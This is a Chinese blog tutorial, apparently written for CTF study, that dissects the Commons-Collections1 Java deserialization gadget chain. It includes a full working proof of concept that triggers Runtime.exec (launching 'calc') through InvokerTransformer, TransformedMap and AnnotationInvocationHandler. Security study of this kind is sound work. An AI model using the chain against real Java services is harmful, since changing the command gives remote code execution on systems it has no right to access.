commons-collections1

最新推荐文章于 2024-06-07 19:04:22 发布
最新推荐文章于 2024-06-07 19:04:22 发布
阅读量575 收藏 16
点赞数 7
分类专栏: CTF Java反序列化 CC链 文章标签: web安全 安全 java 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44558805/article/details/136984616
版权
CTF 同时被 3 个专栏收录
17 篇文章 0 订阅
订阅专栏
Java反序列化
3 篇文章 0 订阅
订阅专栏
CC链
2 篇文章 0 订阅
订阅专栏

Commons-Collections1

测试代码

先给出完整代码

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;

public class CC1TestFinal {
    public static void main(String[] args) throws IOException, InvocationTargetException, IllegalAccessException, NoSuchMethodException, ClassNotFoundException, InstantiationException {

        Transformer[] transformer = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformer);


        Map map = new HashMap();
        map.put("value","fuck");
        Map transformedMap = TransformedMap.decorate(map,null,chainedTransformer);

        Class annotationinvocationhandlerclass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationInvocationhdlConstructor = annotationinvocationhandlerclass.getDeclaredConstructor(Class.class,Map.class);
        annotationInvocationhdlConstructor.setAccessible(true);
        Object o = annotationInvocationhdlConstructor.newInstance(Target.class,transformedMap);
        serialize(o);
        unserialize("ser.bin");
    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
        System.out.println();
    }

    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}

分析

这条链最后执行任意方法的点就是InvokerTransformer类的transform方法
在这里插入图片描述
大概就是接收一个输入,不为空就获取它的Class,然后获取这个类的某一个方法,然后反射调用这个方法
在这里插入图片描述
这里看到InvokerTransformer的构造方法,这里的methodName感觉是可控的,所以用这个方法去调用Runtime.getRuntime().exec(),先写一个命令执行的形式

Runtime.getRuntime().exec("calc");

然后利用反射的形式实现

Runtime r = Runtime.getRuntime();
Class c = Runtime.class;
Method execMethod = c.getMethod("exec", String.class);
execMethod.invoke(r,"calc");

因为Runtime这个类不能被序列化,所以上面的代码就用Class起手实现

Class runtimeClass = Runtime.class;
Method getRuntimeMethod = runtimeClass.getMethod("getRuntime");
Runtime r = (Runtime) getRuntimeMethod.invoke(null,null);
Method execMethod = runtimeClass.getMethod("exec", String.class);
execMethod.invoke(r,"calc");

回到cc1这里,改用InvokerTransformer实现

Class runtimeClass = Runtime.class;
Method getRuntimeMethod =(Method) new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}).transform(runtimeClass);
Runtime runtime =(Runtime) new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}).transform(getRuntimeMethod);
new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(runtime);

这里等于是重复调用了transform方法,在ChainedTransformer这个类中有一个构造方法和函数,可以实现链式调用

在这里插入图片描述

把上面再改写成ChainedTransformer的形式

Transformer[] transformer = new Transformer[]{
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
        new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformer);

然后就是细说一下这里面的东西,看一下,这里transform获取了inputClass类,正好对应上了Runtime类,然后iMethodName理想状况下应该是getRuntime

在这里插入图片描述

可以看到getRuntime是一个无参数的方法,所以这里iArgs应该是为null

在这里插入图片描述

第一句Class runtimeClass = Runtime.class;是获取RuntimeClass

在这里插入图片描述

然后根据InvokerTransformernew一个对象,第一个参数是方法名,第二个数组参数是参数类型,第三个数组参数是方法参数,这里因为传的是Class类型,所以第一步需要获取getMethod方法,对应的第一个参数就是getMethod

用getMethod的目的是调用getRuntime,而getMethod的第一个参数是String类型,第二个参数是null,所以第二个参数就是new Class[]{String.class,Class[].class}然后调用transform得到Method类型的对象getRuntimeMethod

剩下两次的new InvokerTransformer同理

构造好这部分之后先放着不动,接下来找一下都有哪些类调用了transform方法

在这里插入图片描述

这里找到了TransformedMap类的checkSetValue方法

在这里插入图片描述

继续找调用checkSetValue的地方,找到了AbstractInputCheckedMapDecorator类的setValue方法

在这里插入图片描述

继续找调用setValue的地方,在AnnotationInvocationHandler类中,正好readObject方法调用到了setValue

在这里插入图片描述

整条连倒着推过来大概就是这样

在这里插入图片描述

然后就是写TransformedMap的部分

在这里插入图片描述

这个类中的decorate方法会返回一个TransformedMap的实例,并且它的三个参数是我们可以控制的,而valueTransformer调用了transform方法,也就是说只要让valueTransformer参数是chainedTransformer就可以触发

这里new一个Map对象,然后设置一个键值对,至于为什么是这两个值,后面再讨论

Map map = new HashMap();
map.put("value","fuck");
Map transformedMap = TransformedMap.decorate(map,null,chainedTransformer)

入口类调用了checkSetValue,接下来写这一部分

在这里插入图片描述

根据英文的意思,annotationType就是注解类型,常见的就是OverrideTarget……,这里代码大致的意思是获取注解的成员变量,为什么用Target,因为它的成员变量不为空,代码后边会根据Map的key查找注解类型是否存在key成员变量,所以put的时候key值要设置成Target的成员变量value

在这里插入图片描述

在这里插入图片描述

最后就是完善这一部分

Class annotationinvocationhandlerclass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor annotationInvocationhdlConstructor = annotationinvocationhandlerclass.getDeclaredConstructor(Class.class,Map.class);
annotationInvocationhdlConstructor.setAccessible(true);
Object o = annotationInvocationhdlConstructor.newInstance(Target.class,transformedMap);

这条链就结束了

参考链接

https://www.bilibili.com/video/BV1no4y1U7E1/?spm_id_from=333.1007.top_right_bar_window_default_collection.content.click&vd_source=0e561107bf71895281374fc0b905ae17
nsformedMap);

y1Fan_
关注
  • 7
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Commons-Collections1链分析
weixin_45682070的博客
01-04 730
条件限制: ​JDK版本:jdk1.8以前(8u71之后已修复不可利用) CC版本:Commons-Collections 3.1-3.2.1 环境搭建: <dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId&g
Java反序列化之Commons-Beanutils1链与无 commons-collections的Shiro反序列化利用
weixin_45682070的博客
02-11 1435
Apache Commons Beanutils 首先看一下 Commons Beanutils包,Apache Commons Beanutils 是 Apache Commons 工具集下的另一个项目,它提供了对普通Java类对象(也称为JavaBean)的一些操作方法。 JavaBean可以简单的理解为一个Java类对象。 commons-beanutils中提供了一个静态方法 PropertyUtils.getProperty ,让使用者可以直接调用任意JavaBean的getter方法,看面的de
commons-collections1(cc1)反序列化链分析
遇事不决冲冲冲
01-30 5070
commons-collections1也就是常说的cc1,网上一般有两条链子,一个就是ysoserial中的lazymap链,还有transformedmap链,刚开始碰到cc1链子感觉有点麻烦,但只要迈出第一步后面就会挺流畅的,首先在细跟之前一定要有一个大的框架,哪一步完了再跟进到哪一步,像cc1这里主要就是Transformer接口里三个主要的实现类来实现命令执行,然后通过两个不同方法调用执行,即可!
Provides transitive vulnerable dependency maven:commons-collections:commons-collections:3.2.2
Smileyan's blog
03-16 7756
maven依赖警告,vulnerable 脆弱依赖
Commons-Collections1反序列化
m0_62770485的博客
12-05 655
JAVA安全-Commons-Collections1反序列化
Commons-Collections3
Le1a's Blog
03-23 463
Commons-Collections3 文章首发自: https://www.le1a.com/posts/fb41fa9a/ 前言 CC1和CC6都是用Runtime.exec()命令调用来执行命令。CC3、CC2、CC4这几个都是用的动态类加载来执行代码,动态类加载可以看之前发的文章: Java动态类加载 漏洞分析 使用动态类加载来执行代码,就需要用到defineClass类来处理字节码,将其处理为真正的Java类。但由于ClassLoader类里的defineClass都是protected属性,
commons-collections4工具常用方法
qq_63431773的博客
10-05 459
是Apache Commons项目中的一个模块,提供了一系列处理集合和映射的工具类、接口和算法。它是在的基础上进行了改进和增强,为Java开发者提供了更多集合操作的功能和便利性。
Commons-Collections3 , Commons-Collections4反序列化 从0开始手写exp
weixin_51458899的博客
04-12 3017
cc3 关于类的动态加载执行恶意代码 java基础知识中我们学到了一些ClassLoader.defineClass加载 其实这里是ClassLoader这个类会递归,最终调用到defineClass [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6lZu3JAT-1649725376829)(https://raw.githubusercontent.com/hmt38/abcd/main/image-20220411155257616.png)] defineclass
apache-commons-collections1反序列化链分析
11-30 435
apache-commons-collections1反序列化链分析 调试环境 commins-collections3.1 JDK7 漏洞分析 在InvokerTransformer类中的transform方法存在一组反射方法执行 只要能控制参数input、iMethodName、iParamTypes和iArgs,就能调用Runtime.exec执行系统命令!iMethodName、iParamTypes和iArgs是通过构造方法赋值,很明显其值可控 现在要让input参数可控并且为Runtime对
commons-collections介绍
qq_38229263的博客
06-16 4309
Commons Collections增强了Java集合框架。 它提供了几个功能来简化收集处理。 它提供了许多新的接口,实现和实用程序。 <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.4</version> </depend
commons-collections-3.2.2-API文档-中文版.zip
05-01
赠送jar包:commons-collections-3.2.2.jar; 赠送原API文档:commons-collections-3.2.2-javadoc.jar; 赠送源代码:commons-collections-3.2.2-sources.jar; 赠送Maven依赖信息文件:commons-collections-3.2.2....
commons-collections4-4.1-API文档-中文版.zip
07-03
赠送jar包:commons-collections4-4.1.jar; 赠送原API文档:commons-collections4-4.1-javadoc.jar; 赠送源代码:commons-collections4-4.1-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.1.pom;...
commons-collections-3.2.2-API文档-中英对照版.zip
04-20
赠送jar包:commons-collections-3.2.2.jar; 赠送原API文档:commons-collections-3.2.2-javadoc.jar; 赠送源代码:commons-collections-3.2.2-sources.jar; 赠送Maven依赖信息文件:commons-collections-3.2.2....
commons-collections4-4.4-API文档-中文版.zip
05-09
赠送jar包:commons-collections4-4.4.jar; 赠送原API文档:commons-collections4-4.4-javadoc.jar; 赠送源代码:commons-collections4-4.4-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.4.pom;...
commons-collections4-4.4-API文档-中英对照版.zip
05-04
赠送jar包:commons-collections4-4.4.jar; 赠送原API文档:commons-collections4-4.4-javadoc.jar; 赠送源代码:commons-collections4-4.4-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.4.pom;...
基于拓扑漏洞分析的网络安全态势感知模型
最新发布
attack2001的专栏
06-07 583
漏洞态势分析是指通过获取网络系统中的漏洞信息、拓扑信息、攻击信息等,分析网络资产可能遭受的安全威胁以及预测攻击者利用漏洞可能发动的攻击,构建拓扑漏洞图,展示网络中可能存在的薄弱环节,以此来评估网络安全状态。在网络安全形势日益恶化的今天,如何快速有效地获取网络系统的安全状况、提高网络安全应对水平、增大网络安全的预警时间,成为网络空间安全领域研究的重要问题。网络漏洞态势感知研究存在的问题是缺乏有效的网络漏洞势数据采集和要素提取方法,使得网络资产漏洞态势的理解和分析计算难以进行。
自学黑客(网络安全
xv7676的博客
06-07 849
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全第一课
Ying_hao_kun的博客
06-04 504
两台服务器访问必须知道对方的ip,但是ip太难记了,所以有了域名代替IP ,dns的作用就是解析域名变成ip,有了这个之后,访问其他有域名的网站,就不需要再去记ip了,但是我们一定要记住dns服务器的ip,百度服务器的ip假如是200.1.1.3,那么就必须经过网关才可以访问,也就是访问外网必须经过网关处理,这里其中的原理就暂时先不分享了,网关的本机名一般都是第一个或者最后一个。子网掩码(跟IP地址是情侣,不能单身,有ip必须有子网掩码),在同一局域网中,所有的ip必须在同一网段中才能够进行通信。
网络安全中攻击溯源方法
2301_76786857的博客
05-29 1110
攻击溯源可以帮助用户对攻击放进行锁定放入数据库,可以帮助其他用户进行态势感知,同时可以协调相关组织打击违法犯罪行为,避免下一次的攻击。2、分析攻击特征:通过分析攻击事件的特征,如攻击方式、攻击时间、攻击目标等,来确定攻击类型和攻击者的特点。4、分析攻击工具:通过分析攻击者使用的工具、恶意代码等,确定攻击者的攻击技术和水平,进而锁定攻击者身份。5、建立攻击链路:通过对攻击事件的各个环节进行分析,建立攻击链路,找到攻击者入侵的路径和方法。1、收集证据:收集攻击事件的各种证据,包括日志、网络数据包、磁盘镜像等。
commons-collections4.1jar
07-01
1. 扩展集合类:commons-collections4.1.jar提供了一些扩展了Java集合类的类,例如改进了性能和功能的List、Set、Map等。 2. 集合工具类:该库还提供了一些实用的集合工具类,例如CollectionUtils和ListUtils等,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值